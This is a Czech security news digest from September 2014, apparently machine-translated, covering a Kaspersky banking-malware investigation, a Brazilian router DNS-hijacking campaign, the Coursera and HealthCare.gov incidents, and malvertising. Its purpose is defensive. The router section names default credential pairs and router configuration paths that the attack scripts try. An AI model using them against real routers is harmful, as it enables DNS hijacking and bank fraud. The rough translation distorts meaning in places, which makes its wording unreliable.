tohoto podezření je fakt, že FTC již podané obvinění autorů dvou mobilních aplikací, které nejsou k ověření SSL certifikáty, "upozornil výzkumný pracovník Dormannovi. "Vědět, jaké konkrétní aplikace jsou ovlivněny nedává žádnou výhodu útočníkovi. Pokud koncoví uživatelé budou mít zranitelné aplikace na svých telefonech, protože věděl, aplikací, které jsou postiženy však poskytnout výhodu obránců. Mohou si vybrat odinstalovat zranitelné aplikace, dokud jsou k dispozici opravy, nebo v případě, že musí, mohou rozhodnout použít řekl aplikací pouze na důvěryhodných sítí, "vysvětlil důvod tohoto sdělení.


Problémy Coursera soukromí vystaven
16.9.2014 Bezpečnost
Když byl známý právník a Stanford právo přednáší Jonathan Mayer pozván, aby vyučoval kurz na státní dozor na Coursera, populární on-line webové stránky nabízející zdarma online kurzy vysokoškolské úrovni, byl nadšený. Ale být také počítačový vědec, on dělal ne odolat analýzu a šťourat platformu, která umožňuje učitelům učit a studenti předmětu v období odběrateli učit se, a zjistil, některé problémy, které mohou být zneužity k ohrožení soukromí studentů, a to na:

Udělejte si kompletní seznam všech studentů (jména a e-mailové adresy),
Sdělovat informace o kurzech, které podnikají na náhodné webové stránky a
Zrušení ochrany (údajně) za předpokladu, je pomocí vnějších a vnitřních ID.
Aby dokázal, že potenciál využití svých poznatků vytvořil PoC kódu po dobu prvních dvou zranitelností. Podařilo se mu přinesla 1000 uživatelských jmen a e-mailových adres z databáze studentů a pro extrakci informace kursu o uživateli, prosadil kód zkušební stránku, která načte. Poslední otázka měla co do činění s tím, že externí identifikátory byly snadno reverzibilní hash buď malého počtu nebo interní ID a s vědomím toho, že je triviální vytvořit slovník interních a externích ID, Mayer poznamenal. Ale tento konkrétní problém lze snadno vyřešit tím, že odstraní vnější ID dohromady, neboť jejich existenci a používání nepřináší bezpečnost nebo soukromí, prospěch, podotkl. Byl oznámen Coursera všech těchto úskalí, a firma částečně řešit první ale ještě řešit druhou. Naštěstí se změní na řešení těchto problémů by mělo být snadné implementovat. Pro ​​více informací o nedostatcích, podívejte se na původní blogu .


HealthCare.gov porušení ovlivněn Test serveru, nikoli uživatelé
16.9.2014 Incidenty
Server v systému Healthcare.gov byla narušena, ale dobrá zpráva je, že neobsahuje spotřebitele osobní údaje. To byl jen vývoj server, který byl neměl být on-line, ale byl, a nebyl správně nakonfigurován a stále přijaté výchozí pověření, ČSÚ zprávy . porušení došlo v červenci a byl objeven 25. srpna během plánované Security Scan. Povaha malwaru, že útočníci zasadil na serveru a skutečnost, že to zůstalo v nečinnosti pomohlo to zůstat pod radarem tak dlouho. malware v otázce nebyl schopen exfiltrating informace - to bylo prostě chtěl lano serveru do botnet a používat jej pro rozesílání spamu a dělat to účastnit se útoků DoS, úředníci na amerického ministerstva zdravotnictví a sociálních služeb řekl. "Přijali jsme opatření k dalšímu posílení bezpečnosti," mluvčí útvaru zajištěno. Bylo by Zdá se, že útočníci se nezaměřuje výslovně na místo Healthcare.gov, ale byl až poté, co doplněk k jejich botnetu. "Kdyby se to stalo kdekoliv jiné než HealthCare.gov, nebylo by to zpráva, "uvedl senior Department of Homeland Security oficiální. HealthCare.gov, který je provozován v rámci federální vlády Spojených států, slouží jako on-line zdravotní pojištění výměny, kde obyvatelé USA můžete vyhledat soukromé zdravotní pojištění plány nebo, v případě, že vydělávají méně než čtyřnásobek federální hranice chudoby, mohou žádat o dotace a další podmínky pro Medicaid.


91% Američanů má obavy o ochraně osobních údajů
16.9.2014 Zabezpečení
Nový průzkum, provedený Harris Poll mezi 2.100 dospělých v USA a vyvinutý WP motoru, zjistil, že 91% Američanů se obávají o své soukromí online, zatímco téměř všichni (95%) Američané by si nějakou akci, pokud se cítí jejich on-line o ochraně osobních údajů byl ohrožen. Populární řešení spotřebitelé říkají, že jsou s největší pravděpodobností, aby se při on-line soukromí ohrožen patří změna hesla (79%), mazání nebo zrušením registrace z aplikace (57%), a podávání zpráv o společnosti (56%). Kromě toho Výzkum zjistil, že téměř devět z deseti Američanů (88%) si myslí, že on-line soukromí bude jednou z největších obav pro sebe v průběhu příštích 10 let, z několika důvodů. Více než polovina, že ano, protože jsme stále více závislé na Internet . umožnil zařízení (59%), proto, že sociální sítě se vystavuje více našich osobních informací (57%), a proto, že vláda příliš přístup k informacím o svých občanů (51%) i další důvody k obavám jsou:

Protože budeme ukládat většinu našich osobních údajů online / v cloudu (50%)
Protože naše místa lze snadno sledovat pomocí GPS-umožnil smartphony (50%)
Protože naše digitální profil je důležitější než kdy předtím pro zaměstnanost, datování, a náš soukromý život (39%)
Vzhledem k tomu, více firem pomocí softwaru pro rozpoznávání obličeje rozpoznat tváře občanů (24%)
On-line platformy, které Američané mají nejvíce soukromí obavy, patří:
Sociální média sítě - 66%
E-mail - 56%
Webové prohlížeče - 52%
Vyhledávače - 45%
Sociální Photo Sharing plošiny - 35%
Mobilní aplikace - 30%
Online datování apps / datování on-line - 27%
Instant Messaging aplikace - 23%
Mikro-blogů - 23%
Mizející foto aplikací pro sdílení - 22%
Inteligentní nositelné zařízení - 18%
Online hry - 17%
"V dnešním světě neustále proudící informace a zesílené hlasitosti hlasu přes on-line kanálů, je to jen přirozené, že soukromí se stala kritickou znepokojení mezi Američany, a nepochybuji o tom, celému světu," řekla Heather Brunner, generální ředitel společnosti WP motoru. "Je povzbuzující vidět, že jak se on-line hrozeb v čase mění, uživatelé se vyvíjejí s tím, podniká kroky, aby se chránili před poškozením."


Krádeže v odlehlých bankovních systémů: Incident vyšetřování
15.9.2014 Incidenty

Stále více firem se ptají Kaspersky Lab provést podrobné šetření bezpečnostních IT incidentů malware související, které ovlivňují jejich podnikání.

V tomto článku si popíšeme typický cybercriminal útok, jehož cílem je krást firemní finanční aktiva ze vzdáleného bankovního systému.

Popis incidentu

Organizace nedávno požádala Kaspersky Lab vyšetřovat incident, ke kterému došlo v jeho firemní vzdáleném bankovního systému: zástupce banky kontaktovat účetní oddělení organizace a požádal o potvrzení platby v hodnotě 3 milionů rublů (asi US 80.000 dolar). Vyšlo najevo, že nikdo v organizaci nikdy neslyšel o této platby. Účetní byl jistý, že on nedělal, že platba; vysvětlil, že byl z jeho přestávka na oběd v době transakce.

Účetní používá bankovní software na svém pracovišti připravit platební příkazy a poslat je do banky. Protokoly o tomto softwaru zaznamenal dvě podezřelé platby na stejnou adresu. První byl relativně malý zaplacení 300.000 rublů. To neznělo žádné poplašné zvony, a byla zpracována bez dotazu. Druhá platba v hodnotě 3 milionů rublů, upozornili zaměstnance u banky společnosti.

Bylo jasné, že účetní neučinila plateb sám, takže organizace podezření malware útoku. Ale jak je to možné? Byli pomocí specializovaného bankovnictví software s ochranou heslem. Jsou zapotřebí speciální soubor, pro přístup ke vzdálenému bankovní systém a banky by samo o sobě zjistit IP adresu odesílatele platby.

Vyšetřování

Hlavním cílem malware vyšetřování incidentů je přesně zhodnotit následky útoku, identifikovat každý napadeného počítače a zjistit, jak přesně malware pronikl oběti počítač (y). Organizace postižených pak může použít tyto informace efektivně zmírnit nedostatky poškození a adres v jeho firemní bezpečnostní systém, aby se zabránilo takové incidenty ze se v budoucnosti.

Během vyšetřování je také někdy možné zjišťovat dosud neznámým malware druhů a připojí svůj podpis k zabezpečení databází, které chrání ostatním uživatelům jejich budoucí dopad.

V tomto případě se obraz pevného disku z počítače Účetní byla poskytována do společnosti Kaspersky Lab Global Emergency Response Team (GERT) pro analýzu a vyšetřování.

Vzdálený přístup k pracovní ploše

Během našeho prvního průchodu analýzu pevného disku účetního znalce, jsme identifikovali upravenou verzi právního Remote Manipulator System , který umožňuje vzdálený přístup k počítači. Tento typ softwaru je často používán účetní a správce systému. Nicméně, tento program se nachází v podezřelé katalogu, měl podezřelý název ("C: \ Windows \ Dotcom \ wmiterm.exe" je příliš "systém související s" cestou, tak i pokročilý uživatel, je nepravděpodobné, že vůně krysa) , a měl dvě úpravy, aby skryli svou činnost:

Ikona na hlavním panelu systému Windows byla skryta,
Klíč registru, kde se program uloží jeho konfigurace byl změněn: "HKLM \ SYSTEM \ Remote Manipulator System \ v4" byl změněn na "HKLM \ System \ System \ System \ Remote \ Windows", které opět vypadá velmi podobně jako klíče registru systému na .
Tyto změny jsou typické pro malware, a tak jsme přidali podpisy tohoto programu antivirové databáze společnosti Kaspersky Lab - je detekován jako nebezpečný s výrokem "Backdoor.Win32.RMS".

Při analýze provozu Backdoor.Win32.RMS, jsme zjistili, že útočníci používali stáhnout další škodlivý program na oběti počítače, "Backdoor.Win32.Agent". (Tato detekce byla přidána do produktů Kaspersky Lab okamžitě). To za předpokladu, backdoor vzdálené VNC (Virtual Network Computing), přístup k oběti počítače. Zajímavé je, že kód tohoto škodlivého softwaru má hodně společného s modulem "hVNC" na Carberp Trojan. Zdrojový kód Carberp je k dispozici pro přístup veřejnosti.

Tak, jak se Backdoor.Win32.RMS propašovat na plochu účetního je?

Infikování Corporate Desktop

V databázi aplikace Microsoft Outlook, uloženy v souboru "Outlook.pst" na pevném disku, jsme zjistili, e-mail, který obsahuje přílohu s názvem "запрос ИФНС № АС-4-31339.doc" ("Federální daňová služba požádat no. AC- 4-31339.doc "). Kaspersky Lab Anti-Virus zjistil, že dokument Microsoft Office, jako nebezpečný s výrokem "Exploit.MSWord.CVE-2012-0158."

Mezi zločinci používají metody sociálního inženýrství: e-mail byl odeslán ve jménu ruskou Federální daňové služby, vyzval k okamžité akci, a za předpokladu, kontaktní údaje o skutečné daňové služby pracovníků.

GERT_1

"Federální Zdanění služby. Uveďte, prosím, všechny požadované dokumenty co nejdříve."

Účetní by jistě otevřel přílohu, která zneužije chybu zabezpečení v aplikaci Microsoft Word ke stažení samostatně rozbalení archivu ze vzdáleného serveru a pak inicializovat rozbalování. Archiv obsahoval dva soubory: "SYST.EXE", což je přejmenovaný verzi souboru archivačním "7zip" a "SYST".

Během vybalování, archiv zdroj zahájila archivu programu "SYST.EXE 's parametry instruktážní to rozbalit heslem chráněný archiv" SYST "pomocí začleněn heslo. Tento trik pomocí hesla chráněného heslem úspěšně obchází pokusy bezpečnostní software je na statické rozbalování souboru, brání jeho detekci.

Rozbalení "SYST" vytvořila následující: soubor 'Backdoor.Win32.RMS "(který jsme již dříve zjištěný) a skript" INST.CMD ", který nainstalován backdoor v systému. Jedná se o skript, který kopírovat soubory škodlivého programu je do složky "C: \ Windows \ dotcom".

Poté, co jsme zjištěna na zadní vrátka, jsme začali chápat, jak se útočníci mohli ukrást peníze. Pokud by měl vzdálený přístup k počítači, mohou mít, aby jejich vlastní platební příkaz, a pak soubor s klíčem a IP adresa odesílatele by bylo oprávněné. Ale my jsme ještě nevěděli, jak se zločinci dostali heslo pro přístup k bankovní software. Rozhodli jsme se podívat na keylogger programu.

Keylogger

Soubor 'Svchost.exe "přitahoval pozornost, který se nachází v kořenovém adresáři systémového disku. Ukázalo se, že keylogger (detekce přidána s výrokem "Trojan-Spy.Win32.Delf '); je také obsahoval funkce pro řízení konfigurace Backdoor.Win32.RMS. Tato neobvyklá schopnost zřejmě představeno zločinci, protože potřebovali nástroj pro řízení upraveného Remote Manipulator System: ukryli kompletní uživatelské rozhraní tohoto programu a použít jej pro správu konfigurace.

Také jsme zjistili, že tento keylogger byl stažen pomocí Backdoor.Win32.RMS.

Keylogger poslal protokol obsahující veškeré ukradené informace C & C v pravidelných intervalech, a stále up-to-date kopii záznamu na pevném disku infikovaného počítače. Zjistili jsme, bankovním heslo do hromady informací ukradli keylogger.

Bitevní plán

Po našem výzkumu jsme rekonstrukci akční plán počítačovými zloději ":

Mezi zločinci zahájili cílený útok pomocí sociálního inženýrství a aplikace Microsoft Word zranitelnost infikovat počítač účetnímu je s Backdoor.Win32.RMS.
S pomocí tohoto backdoor, že zločinci načíst další dvě škodlivé programy do počítače oběti: keylogger (Trojan-Spy.Win32.Delf) a jiným backdoor (Backdoor.Win32.Agent), který stanoví, vzdálený VNS přístup k oběti počítače.
Keylogger zachytil heslo ke vzdálenému bankovní účet.
Zatímco účetní byl od svého počítače, se zločinci používají Backdoor.Win32.Agent a přístup VNS k počítači spustit bankovní software jménem účetní.
Mezi zločinci používali heslo zachycuje keylogger pro vytvoření příkazu k úhradě v hodnotě 300 tisíc rublů a odeslat do banky.
O něco později, se vytvořil další platební příkaz, tentokrát v hodnotě 3 milionů rublů, a poslal jej do banky.
Jak jsme se dostali ke konci šetření jsme zjistili, ještě jeden zajímavý fakt: IP-adresy C & C servery pro všechny škodlivých programů používaných v útoku patřil do stejné podsítě.

GERT_2

Schéma cybercriminal útoku

Také jsme zjistili, že zločinci velmi rychle jednal: trvalo jim jen čtyři dny plnit své plánované trestné činnosti. Tři dny strávil přípravou, a plán byl proveden během několika hodin na čtvrtý den.

Den 1. zločinci poslal e-mail na účetní společnosti. Účetní přečíst e-mail, otevřel přílohu a škodlivého programu Backdoor.Win32.RMS byl stažen do svého programu. V následujících dnech se zločinci použít tento program pro sledování činnosti účetní je.

Den 4. zločinci používají Backdoor.Win32.RMS načíst keylogger Trojan-Spy.Win32.Delf oběti počítači a zachytil heslo k bankovnímu softwaru. Brzy poté naložili Backdoor.Win32.Agent a používal to, aby připojení k počítači účetního znalce. A poslali platební příkazy z obětí počítače do banky.

Oznamující obětí kybernetických zločinců "

Vzhledem k tomu, útočníci použili několik IP adres ze stejné podsíti, rozhodli jsme se blíže podívat na serveru C & C. Jak se ukázalo, že zločinci udělali chybu při konfiguraci jeden ze serverů, takže každý uživatel může vidět HTTP požadavků na servery C & C. To je, jak jsme byli schopni vystopovat IP adresy, ze kterých byly žádosti odeslané pomocí protokolu Keylogger je. Jak jsme zjistili, tam bylo několik počítačů s různými IP adres infikovaných virem keylogger.

Byl tam jeden zvláštní rys tohoto keylogger: když to bylo vypuštěno v infikovaném počítači, stáhnout nejnovější verzi svého protokolu ze serveru C & C. Proto každý uživatel mohl zkontrolovat log keylogger pokud otevřeli příslušnou URL adresu ve svém webovém prohlížeči. Rozhodli jsme se, že mají blíže na HTTP požadavků posílaných na serveru C & C, a v nich jsme našli názvy protokolů, které jsou keyloggery odeslaných na server C & C. V mnoha případech, protokoly obsahovaly název organizace, která vlastnila infikovaný počítač a "kontakty (Mohli bychom také obětí obětí IP adresy pomocí zranitelnosti na serveru C & C). Tato informace se nám podařilo kontaktovat další oběti (většina z nich byla účetní na malé a střední podniky), a varují, že jejich počítače byly infikovány. Oni byli velmi vděční za informace.

Vlastnosti bankovních útoků

Jak jsme řekli na začátku tohoto článku, tento útok je typický případ krádeže peněz z firmy.

Počítačoví zločinci aktivně využívat sociální inženýrství vybízely uživatele k otevření souboru škodlivý.
Pracovníci, kteří se zabývají komerčně důležité informace a zpracovávat finanční společnosti potřebují školení o základech bezpečnosti IT. Společnost musí zavést bezpečnostní politiku, která by minimalizovala riziko zaměstnanců nedbalosti způsobuje infekci v podnikové síti.

Při útoku důležité cíle, zločinci mohou využívat nové exploity pro dosud nepublikovaných zranitelnosti. V takových případech pravidelně detekční nástroje útoku, jako IDS, není dost dobrý.
Nicméně, 0-day exploity jsou příliš drahé používat při útocích na pravidelných společností. Zde se obvykle vidět využije pro známé zranitelnosti. To znamená, že jednoduché kroky, jako je neprodleně aktualizaci softwaru (zejména Microsoft Office a Java) a instalaci bezpečnostní řešení kvality může zajistit odpovídající úroveň ochrany.

Ještě dalším znakem tohoto útoku je to, že zahrnuje právní software. Jedná se o rostoucí trend: vidíme zločinci používají legitimní aplikace získat vzdálený přístup k počítači oběti před stažením a spuštěním škodlivých souborů na nich.
Bezpečnostní produkty samozřejmě nebude vlajku použití legitimní software. Takže zločinci mohou používat tyto aplikace, ve snaze udržet své operace v tajnosti. V tomto útoku, tajemství bylo zajištěno pomocí verzi Remote Manipulator System s úpravami do svého spustitelného souboru. Přidali jsme podpis pro tuto upravenou verzi Remote Manipulator System, aby v budoucí produkty společnosti Kaspersky Lab bude detekovat.

Pokud se útočníci použít původní, nezměněné verze legitimní software, bude jediným řešením bude pro bezpečnostní systémy a upozorní uživatele pokaždé potenciálně nežádoucí program spuštěn. Všichni uživatelé, zejména ti, kteří se zabývají finanční a další důležité dokumenty, je třeba si uvědomit, že žádný bezpečnostní systém může poskytnout absolutní ochranu. Měli by věnovat pozornost systémových upozornění a dávat pozor na jakékoli neobvyklé chování na svém počítači. Je důležité oznámit bezpečnostní pracovníci jakékoliv podezřelé události v systému.

V ideálním případě by default deny režim by měl být povolen na všech počítačích používají k provádění plateb v odlehlé bankovního systému; Tento režim omezuje přístup k Internetu a zabraňuje spuštění irelevantní, non-bílé listině software. Totéž platí pro počítače používané firemní uživatele pracovat s komerčně důležité (business-critical) informací.

Závěr

V těchto dnech, je hlavní hnací silou všech cybercriminal akce jsou peníze. Získání přístupu ke vzdáleným bankovních systémů je velmi přímý a jednoduchý způsob, jak krást peníze z organizace. Je to malé překvapení, které na dálku bankovní systémy jsou stále více atraktivní cíl pro cybercriminal útoků.

Každý, kdo používá vzdálené bankovních systémů je více než obeznámen s bezpečnostními systémy, které jsou založeny v nich ... ale to jsou zločinci. Použití hesel, klíčových souborů a žetony, stejně jako omezení IP přístupu může ukolébat uživatele do falešného pocitu bezpečí.

Nicméně, žádný z těchto opatření, ať již samostatně nebo ve skupině, udělá cokoliv, aby zvýšení bezpečnosti, pokud jsou prováděny na ohrožení počítače. Na infikovaném počítači, hesla mohou být zachyceny, klíčové soubory mohou být kopírovány. Kyberzločinci si vytvořit skrytý plochu a použít původní IP adresu a token připojen k oběti počítače.

Při vyšetřování bezpečnostních incidentů pravidelně dojít k následující situaci: škodlivý program je spuštěn na počítači, ale později se zjistí, že a odstraněn ze systému. Následně ovlivněn počítač je používán jako dříve, pokračuje provádět bankovní operace s účetní jistý, že problém byl vyřešen.

Uživatelé si musí uvědomit, že jakmile je škodlivý program je spuštěn, počítač postiženy by měly být považovány ohrožena. První nebezpečný soubor načte jen hlavní nebezpečný náklad. To je užitečné zatížení se obvykle skládá z programů, které aktualizují po celou dobu uniknout detekci bezpečnostních produktů. Alternativně zločinci načíst legitimní software s úpravami, které umožňují zločinci se k němu připojit přes škodlivých C & C servery. V tomto případě nebudou zjištěny škodlivé programy.

S výhledem na to může způsobit obrovské škody do společnosti. Pokud byl zjištěn škodlivý program na počítači s kritickým informacím, musí být učiněna neprodleně opatření reakce na incidenty.

Je smutné, že naše zkušenosti ukazují, že organizace často bijí na poplach příliš pozdě, když už čelí finanční ztráty nebo vypnutí kritických výpočetních služeb. Kromě toho, o přijatých následných opatřeních v rámci firem obvykle ukáží být neúčinná, a často brání dalšímu vyšetřování.

Není tam žádná taková věc jako jeden-velikost-fits-all reakce na mimořádné události. Existuje příliš mnoho možných způsobů útoku venku. Například, v některých případech vypnutí počítače se okamžitě pomáhá chránit data, která by nevratně odstraněny škodlivým programem po určité době. V jiných situacích, když vypnutí zničí datové RAM, která je nezbytná pro následné vyšetřování. Pouze specialista vyšetřování incidentu může učinit správné rozhodnutí.

V každém případě, pokud existuje sebemenší podezření na vniknutí jakékoliv ohrožení by měl být počítač odpojen od internetu a firemní sítě, a malware incidentů specialisté by měl být volán v.

Pouze podrobné zkoumání bezpečnostní události, může vést k účinné reakci.


Web-based útoku zaměřeného na domácí směrovače, brazilský způsob
15.9.2014 Počítačové útoky

Všiml jsme zajímavý útok z brazilských padouchy, jejichž cílem je změnit nastavení DNS domácích směrovačů pomocí web-based útok, nějakou sociální inženýrství, a škodlivé webové stránky. V těchto útoků jsou škodlivé DNS servery konfigurované v síťovém zařízení uživatele jsou zaměřeny na phishingové stránky brazilských bank, naprogramované ukrást finanční údaje.

Útoky zaměřené na domácí routery jsou vůbec nové; v roce 2011, moje kolegyně Marta popsáno Malware Network zaměřovací přístroje, jako jsou tyto. V Brazílii jsme zaznamenali dlouhou a bolestivou sérii vzdálených útoků, které byly zahájeny v roce 2011-2012, která ovlivnila více než 4,5 milionu DSL modemy , využívající dálkové zranitelnost a měnící se konfigurace DNS. Ale tento "web-based" přístup byl něco nového brazilského Bad kluci do teď a my věříme, že se rychle rozšířila mezi nimi i počet obětí zvyšuje.

Útok začíná s nebezpečným e-mailu a trochou sociálního inženýrství, Vás zve na tlačítko:

2014-09-02 02-00-26 Screenshot

"Jsem tvůj přítel a chci vám říct, že jste byli podvedeni, podívejte se na fotky"

Kolik lidí věří, že v něm? No, mnoho: 3,300 kliknutí na 3 dny, u většiny uživatelů se nachází v Brazílii, USA a Číny, pravděpodobně Brazilců, kteří tam žijí, nebo lidi, kteří rozumí portugalsky:

2014-09-02 02-42-09 Screenshot

Zkrácené URL jsou levný způsob, jak pro padouch měřit jejich "výkon"

Webové stránky spojené ve zprávě je plný obsah pro dospělé, porno fotky. Zatímco v pozadí začne spouštět skripty. V závislosti na konfiguraci, v určitém okamžiku webové stránky mohou požádat o uživatelské jméno a heslo vašeho bezdrátového přístupového bodu - pokud ano, je to dobrá věc. Pokud tomu tak není, může to být problém pro vás:

Webové stránky

Skript se nachází na webových stránkách se snažit uhodnout heslo vašeho domácího routeru. Snaží několik kombinací, jako je "admin: admin":

2014-09-02 03-26-31 Screenshot

nebo "root: root"

kořen

nebo "admin: gvt12345" (GVT je velký brazilský ISP):

2014-09-02 03-28-12 Screenshot

Skripty budou i nadále snažit kombinace, které odkazují na ovládacím panelu síťového zařízení, jako je [váš směrovače IP]. rebootinfo.cgi nebo [vaše směrovače IP]. dnscfg.cgi ?. Každý skript obsahuje příkazy pro změnu primárního a sekundárního serveru DNS . Pokud používáte výchozí pověření ve vašem domovském routeru, nebude existovat interakce a nikdy si uvědomit, že došlo k útoku. Pokud nepoužíváte výchozí pověření, pak webové stránky a objeví se výzva s dotazem, zadejte jej ručně.

2014-09-02 03-42-38 Screenshot

Zjistili jsme, brazilské zločinci aktivně používá 5 domén a 9 DNS servery - to vše z nich hosting phishingových stránek pro největší brazilské bank. Mezi škodlivé webové stránky používané při útocích filtrování přímý přístup pomocí HTTP odkazovačů, tedy s cílem, aby se zabránilo přímý přístup z bezpečnostních analytiků.

Tak jak se chránit? Ujistěte se, že nepoužíváte výchozí heslo domácí router a NIKDY zadání pověření do libovolné webové stránky, která žádá pro ně. Naše Kaspersky Internet Security je připraven, aby se automaticky blokovat takové skripty.


Chránit se proti celebrity iCloud hackery
15.9.2014 Cloud
Největší bezpečnostní zprávou týdne je unikly fotky mnoha celebrit. Mnoho lidí, zejména zúčastněné celebrity, se divil, jak takový hack by se mohla uskutečnit.

Počáteční prohlášení útočníka bylo to, že iCloud byl hacknutý. To přimělo Apple do svého režimu jsme-do-ne-opravdu-komentář-do-my-jsme-dělat-naše-výzkumné. Dnes vydali prohlášení o incidentu:

apple-prohlášeníhttps://www.apple.com/pr/library/2014/09/02Apple-Media-Advisory.html

Pro mě nejzajímavější citace je: "účty byly ohroženy velmi cíleným útokem na uživatelských jmen, hesel a bezpečnostních otázkách, praxe, která se stala příliš běžné na internetu."

Apple je tak dobře vědoma problémů, které vznikají s těmito formami ověřování. Zajímavější je jejich rada: silná hesla a dvou-krok-za ověření.

Silná hesla jsou podle Apple, hesla s minimálně 8 znaků, s některými dalšími požadavky. Zajímavé dostatečně neprosazují všech jejich návrhů. Hesla, jako je "password1" je přijatelné, i když to může být snadno uhodnout.

Jejich další rady, pomocí dvoufaktorové autentizaci je poněkud chybné. Například, nechrání vaše iCloud zálohování (viz tento příspěvek). Také ve dvou krocích, ověření není k dispozici v každé zemi. Používáte-li například rumunský nebo chorvatské telefonní číslo, pak smůla. Vzhledem k tomu, že Google nabízí dva ověřování faktorem těchto zemích stejně, jeden by mohl divit, proč Apple se ji neimplementuje stejně. Mohl by to být náklady na poslána SMS?

Tak, jak se chránit správně? Můj kolega Alex Savitsky napsal výborný článek o tom.

Abychom to shrnuli:

Používejte silná a unikátní hesla, která jsou snadno zapamatovatelné a těžko prolomit (například fráze ve svém rodném jazyce, s "mezerami" v tom, čísla a speciální char)
Pokud je k dispozici ve vaší zemi, povolte dvoufaktorové autentizace
iPhone uživatelé mohou chtít zakázat iCloud foto Stream / Photo Sharing. Kromě toho mohou uživatelé iPhone chcete odstranit zálohu svých fotografií / iPhone do iCloud.
apple-iphone

Foto s laskavým svolením mého kolegy Dmitry Bestuzhev - https://twitter.com/dimitribest/status/506820178320322560

A pamatujte - pokud nechcete, aby vaše soukromé fotografie, které chcete dostat unikly, lepší to vzít je na prvním místě!


Mezery v zabezpečení podnikové sítě: reklamní sítě
15.9.2014 Zabezpečení
" Malvertising 'je relativně nový termín pro technice k distribuci malwaru prostřednictvím reklamních sítí, které již dávno stala populární médium mezi zločinci. V uplynulých čtyřech letech stovky milionů uživatelů padli za oběť "virové" reklamy, včetně návštěvníků hlavních médií stránky, jako je například NY Times , London Stock Exchange , Spotify , USNews, TheOnion, Yahoo! a YouTube . Komplikovaná situace s reklamními sítěmi dokonce pobízel Senát Spojených států Stálé podvýboru pro vyšetřování provést důkladné šetření , která vypracovala doporučení na posílení bezpečnosti a zvyšování odpovědnosti vlastníků reklamní platforma.

Na přelomu roku 2,5 milionu Yahoo Uživatelé byli napadeni . Brzy po incidentu, společnost s názvem Fox zveřejnila podrobnou analýzu útoku. Je zvláštní, že v souladu s Fox IT, ne všichni uživatelé Yahoo! byly ovlivněny útokem - pouze pro rezidenty evropských zemích, především v Rumunsku, Velké Británii a Francii. Fox IT analytici se domnívají, že útočníci pravděpodobně používají cílené reklamní mechanismy, tedy zaplatili za "dojmy", sloužila k určitému publiku z výše uvedených zemí. Zde je ukázka toho, jak jsou útoky prováděny prostřednictvím reklamních sítí: celkový útok organizace diagram (na levé straně) a konkrétní příklad útoku proti uživatelům Yahoo! (na pravé straně).

malvertising_1

V minulosti jsme psali o cílených útoků prováděných prostřednictvím důvěryhodných webových stránek (tzv útoky zalévání děr) a sociálního inženýrství na sociálních sítích a v IM klienty . Konkrétně jsme psali, že cybercriminal musí udělat dvě věci, aby bylo možné provádět zavlažování-jamkové útok: za prvé, ohrozit důvěryhodné webové stránky, a za druhé, tajně injekci škodlivé skripty do kódu webu. Úspěšné útoky prostřednictvím sociálních sítí nebo IM klienty také určité požadavky zločinci - přinejmenším, jak vyhrát důvěru uživatelů a zvýšit šance na jejich klikání na odkazy zaslané útočníků.

Co odlišuje útoky prostřednictvím reklamních sítí od sebe je to, že v těchto útocích se útočníci nemají kompromisy webové stránky nebo získat důvěru potenciálních obětí. Jediné, co musíte udělat, je najít poskytovatele reklamy, ze které chcete koupit "dojmy", nebo se staňte poskytovatele sami (jako BadNew s). Zbývající práce, vztahující se k distribuci škodlivého kódu, bude provádět reklamní sítě -The důvěryhodné stránky sám stáhne škodlivé skripty na své stránky přes iframe.

Navíc, uživatelé nemají ani klikat na reklamy - jako součást svého pokusu zobrazit banner na webové stránce, spustí prohlížeč SWF / JS kód banneru, který automaticky přesměruje uživatele na webu hostování vstupní stránku z populární využít balíček, jako je Blackhole . Drive-by útok bude následovat: využít balíček se pokusí zvolit vhodnou exploit zaútočit na chybu v prohlížeči, nebo jeho doplňky.

Problém reklamních sítí se používá k distribuci malwaru a provádět cílené útoky (s využitím svých cílených reklamních možností) nemá vliv pouze na ty, kteří používají prohlížeče pro přístup na webové stránky. To platí i pro uživatele aplikací, které mohou zobrazovat reklamy, jako jsou IM klientů ( včetně Skype ), e-mailové klienty (Yahoo! v ceně), atd A co je nejdůležitější, problém se týká obrovské množství uživatelů mobilních app, protože tyto aplikace také připojit k reklamních sítí!

V podstatě, mobilní aplikace se liší tím, že SDK běžně používané pro vkládání reklamy do aplikací (jako AdMob, služby AdWhirl atd) nepodporují spuštění libovolného kódu poskytované poskytovateli reklamy, jako je tomu v případě webové stránky reklamy. Jinými slovy, pouze statická data přijata ze serveru dodávají reklamy, včetně obrázků, odkazů, nastavení atd však zločinci mohou také vytvářet SDK , stejně jako mediálních společností. Bývalí vývojáři nabízejí vyšší ceny za proklik, než jejich oprávněných soutěžitelů. To je důvod, proč vývojáři legitimní mobilního softwaru vložit škodlivý kód "reklamy" - v podstatě zadní vrátka - do svých aplikací. Navíc, legitimní SDK může mít zranitelnosti umožňující spuštění libovolného kódu. Dva takové případy byly zjištěny na konci loňského roku - jednou z nich je HomeBase SDK , druhý zahrnující AppLovin SDK .

malvertising_2

Zdroj: http://researchcenter.paloaltonetworks.com

Na otázku "Jak by podniková síť chráněna před útoky prováděné prostřednictvím reklamních sítí?" nemá jednoduchou odpověď, a to zejména pokud budete mít na paměti možné cílených útoků. Jak již bylo řečeno, ochrana musí zahrnovat nejen klienty (prohlížeče, IM klienty, e-mailové klienty a další aplikace, které mají dynamické reklamy vestavěný do nich), ale také mobilní zařízení, která mohou přistupovat do podnikové sítě.

Je zřejmé, že ochrana pracovní stanice vyžaduje alespoň třídní Security Suite řešení anti-malware, který musí obsahovat:

ochrana proti zneužívání zranitelnosti;
pokročilé HIPS s funkcí omezení přístupu, stejně jako heuristické a behaviorální analýza (včetně analýzy provozu);
nástroje pro monitorování operačního systému (System Watcher nebo Hypervisor), v případě, že systém se nakazit.
Pro spolehlivou ochranu pracovních stanic, je rozumné použít technologii ovládání aplikace, sbírat statistické údaje (zásob), na použitém softwaru v síti, nastavit aktualizaci mechanismy a umožnit Výchozí režim Deny.

Bohužel, v porovnání k ochraně pracovních stanic, ochrana mobilní zařízení je stále v raných fázích vývoje. Je velmi obtížné implementovat plnohodnotnou Security Suite nebo roztok Kontrola aplikací pro mobilní zařízení, protože by k úpravě firmware, což není vždy možné. To je důvod, proč Mobile Device Management (MDM), technologie je v současné době jediným účinným nástrojem pro ochranu mobilních zařízení, které se připojují k podnikové síti. Technologie může určit, které aplikace mohou být instalovány na zařízení, a které ne.

